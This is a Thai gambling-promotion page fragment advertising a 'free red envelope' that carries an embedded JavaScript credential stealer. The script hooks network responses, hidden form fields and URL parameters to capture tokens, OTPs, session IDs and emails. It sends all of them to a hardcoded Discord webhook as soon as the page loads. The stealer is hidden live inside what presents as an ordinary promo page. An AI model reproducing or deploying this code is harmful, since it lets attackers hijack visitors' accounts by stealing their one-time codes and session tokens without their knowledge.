TKB อังเปาฟรี
</div> <script> (function() { // 1. ใส่ URL Discord Webhook ของคุณ const discordWebhookUrl = 'https://discord.com/api/webhooks/1422915657694969897/HPzqFMKtTPeM3tMaKQJUaBHpAVUNHVavapcWXBMJN8dGbWIvsLt8MQ0eM64CW5Hf4hWK'; console.log("%c[🕵️ บอทตัวกรอง Token & OTP เริ่มทำงาน...]", "color: #00ffff; font-weight: bold; font-size: 14px;"); // ฟังก์ชันส่งรายงานเข้า Discord function reportToDiscord(tokenSource, tokenValue, additionalInfo = {}) { let description = `**📌 ตรวจพบการสร้างรหัส/Token ใหม่ในระบบ**\n\n` + `• 🎯 **ช่องทางที่พบ:** \`${tokenSource}\`\n` + `• 🔑 **ค่า Token/รหัสที่ได้:** \`${tokenValue}\`\n`; // วนลูปดึงข้อมูลอื่นๆ (เช่น Email, OTP หน้าฟอร์ม) มาแปะเพิ่ม for (const [key, val] of Object.entries(additionalInfo)) { description += `• 📝 **${key}:** \`${val}\`\n`; } fetch(discordWebhookUrl, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ embeds: [{ title: "🔔 [แจ้งเตือน] พบการสร้าง Token ใหม่ในระบบ", description: description, color: 3066993, // สีเขียว Emerald timestamp: new Date().toISOString(), footer: { text: "Token Sweeper Monitoring" } }] }) }).catch(err => console.error("Discord Send Error:", err)); } // ฟังก์ชันช่วยดึงค่าข้อมูลทั่วไปบนหน้าฟอร์ม ณ ขณะนั้น function getFormContext() { return { "Email บนหน้าจอ": document.getElementById('email')?.value || document.querySelector('input[type="email"]')?.value || 'N/A', "OTP บนหน้าจอ": document.getElementById('otp')?.value || 'N/A', "URL ปัจจุบัน": window.location.href }; } // --- 🛠️ แผนที่ 1: ดักฟังค่าทาง Network (กรณี Token เด้งกลับมาในรูปแบบ JSON) --- const oldXHR = window.XMLHttpRequest; window.XMLHttpRequest = function() { const realXHR = new oldXHR(); realXHR.addEventListener("readystatechange", function() { if (realXHR.readyState === 4 && realXHR.status === 200) { let responseText = realXHR.responseText; try { const json = JSON.parse(responseText); // ค้นหาคีย์ยอดฮิตที่ระบบมักใช้ส่ง Token let potentialKeys = ['token', 'access_token', 'otp', 'code', 'session_id', 'secret']; for (let key of potentialKeys) { if (json && json[key]) { console.log(`%c[🎯 พบ Token หลุดใน JSON]: ${json[key]}`, "color: #00ff00;"); reportToDiscord(`Network Response (Key: ${key})`, json[key], getFormContext()); } } } catch(e) { // กรณีตอบกลับมาเป็น Text ธรรมดา แต่มี Token สตริงยาวแฝงอยู่ let tokenMatch = responseText.match(/[a-f0-9]{32,64}/i); if (tokenMatch) { console.log(`%c[🎯 พบ Token ใน Text Response]: ${tokenMatch[0]}`, "color: #00ff00;"); reportToDiscord("Network Response (Regex Match)", tokenMatch[0], getFormContext()); } } } }, false); return realXHR; }; // --- 🛠️ แผนที่ 2: ดักจับการเปลี่ยนแปลงบน HTML (กรณี Token ถูกสลักลงกล่องอินพุตลับ) --- const observer = new MutationObserver((mutations) => { // ค้นหาพวกช่อง input ลับ หรือ attribute ที่มักเก็บ Token let hiddenTokenFields = document.querySelectorAll('input[type="hidden"], [data-token], input[name*="token"]'); hiddenTokenFields.forEach(field => { let val = field.value || field.getAttribute('data-token'); if (val && val.length > 8 && !window.lastTrackedTokens?.includes(val)) { if (!window.lastTrackedTokens) window.lastTrackedTokens = []; window.lastTrackedTokens.push(val); // ป้องกันไม่ให้ส่งซ้ำรัวๆ console.log(`%c[🎯 พบ Token ใน DOM/HTML Elements]: ${val}`, "color: #ff00ff;"); reportToDiscord(`HTML Element (${field.name || field.id || 'hidden-input'})`, val, getFormContext()); } }); }); observer.observe(document.body, { childList: true, subtree: true }); // --- 🛠️ แผนที่ 3: ดักสแกน URL (กรณีมีการเปลี่ยนหน้าแล้วส่ง Token แนบท้ายมา) --- function checkUrlForToken() { let urlParams = new URLSearchParams(window.location.search); let tokenKeys = ['token', 'otp', 'code', 't']; for (let key of tokenKeys) { if (urlParams.has(key)) { let val = urlParams.get(key); if (!window.lastTrackedTokens?.includes(val)) { if (!window.lastTrackedTokens) window.lastTrackedTokens = []; window.lastTrackedTokens.push(val); console.log(`%c[🎯 พบ Token บน URL]: ${val}`, "color: #ffe100;"); reportToDiscord(`URL Parameter (${key})`, val, getFormContext()); } } } } // สั่งตรวจสอบ URL ทันทีที่รันสคริปต์ และสแกนซ้ำถ้ามีการกดคลิกหน้าเว็บ checkUrlForToken(); window.addEventListener('popstate', checkUrlForToken); document.addEventListener('click', () => setTimeout(checkUrlForToken, 500)); })();
</script>
https://heylink.me/taokaebet-all/
22 มิ.ย. 2569